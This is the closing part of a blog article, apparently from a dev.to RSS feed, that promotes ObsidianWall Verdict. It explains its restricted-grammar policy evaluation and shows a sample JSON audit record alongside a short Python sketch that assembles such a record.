&lt;p&gt;A governance engine is only useful if the people governed by it trust it. Trust requires transparency. Transparency requires that the system's behavior be fully describable — that an engineer, a compliance officer, or a regulator can read the evaluation trace and verify independently that the decision was correct.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;eval()&lt;/code&gt; cannot offer that guarantee. A restricted expression grammar can.&lt;/p&gt;

&lt;p&gt;The minimal grammar is not a limitation imposed by inability. It is a design statement:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;This system does exactly this, and nothing else. You can verify that. We built it that way on purpose.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;That is what programmable assurance means.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Audit Output
&lt;/h2&gt;

&lt;p&gt;When Verdict evaluates a plan and reaches a decision, the audit artifact looks like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"decision"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"DENY"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"conditions_passed"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"trace"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"condition_id"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"budget_check"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"expression"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"(current_spend + estimated_cost) &amp;lt;= budget.amount"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"result"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"description"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"Monthly spend cap enforcement"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"input_context"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"estimated_cost"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"current_spend"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"runtime_context"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"estimated_cost"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"current_spend"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"budget.amount"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mf"&gt;50.0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"budget.period"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"monthly"&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Two contexts are preserved separately — &lt;code&gt;input_context&lt;/code&gt; captures what came in from the infrastructure plan, &lt;code&gt;runtime_context&lt;/code&gt; captures the fully normalized state the evaluator actually saw. That separation matters for forensic reconstruction, compliance export, and replay — you can reproduce the exact evaluation state at any point in the future from the audit record alone.&lt;/p&gt;
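
&lt;p&gt;One way to assemble a record of this shape, as a sketch under stated assumptions: the function name is hypothetical, the &lt;code&gt;"ALLOW"&lt;/code&gt; label is assumed (the article only shows &lt;code&gt;"DENY"&lt;/code&gt;), and the decision is derived from the per-condition results. It does not attempt to model immutability or storage.&lt;/p&gt;

```python
import json


def build_audit_record(trace, input_context, runtime_context):
    """Serialize a decision record shaped like the example above."""
    passed = all(entry["result"] for entry in trace)
    record = {
        # "ALLOW" is an assumed label; the article only shows "DENY".
        "decision": "ALLOW" if passed else "DENY",
        "conditions_passed": passed,
        "trace": trace,
        # What arrived from the plan, kept apart from what the evaluator saw.
        "input_context": input_context,
        "runtime_context": runtime_context,
    }
    # sort_keys makes the serialized text independent of dict insertion order.
    return json.dumps(record, sort_keys=True, indent=2)
```

&lt;p&gt;Serializing with sorted keys means two runs over the same inputs produce identical text, which makes records straightforward to diff or hash during replay.&lt;/p&gt;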




&lt;h2&gt;
  
  
  What's Next
&lt;/h2&gt;

&lt;p&gt;This is the first article in a series on the architecture behind ObsidianWall.&lt;/p&gt;

&lt;p&gt;The next two cover:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How the enforcer/recommender separation preserves the AI authority boundary&lt;/strong&gt; — why the system that makes enforcement decisions must be architecturally isolated from the system that generates recommendations, and what happens to governance trust when that boundary is violated.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How programmable assurance differs from reactive governance&lt;/strong&gt; — why alerting, dashboards, and drift detection are fundamentally different abstractions from deterministic decision systems, and why that difference matters in AI-era infrastructure.&lt;/p&gt;

&lt;p&gt;ObsidianWall Verdict is currently in early access.&lt;/p&gt;

&lt;p&gt;If you are dealing with infrastructure budget overruns, compliance violations discovered after deployment, or policy drift across engineering teams — Verdict was built for exactly that problem.&lt;/p&gt;

&lt;p&gt;Early access: &lt;strong&gt;&lt;a href="https://obsidianwall.com" rel="noopener noreferrer"&gt;obsidianwall.com&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Aisha is the founder of ObsidianWall — a programmable assurance platform for deterministic governance and AI-native operational intelligence.&lt;/em&gt;&lt;/p&gt;




</description>
      <category>devops</category>
      <category>security</category>
      <category>python</category>
      <category>terraform</category>
    </item>
  </channel>
</rss>
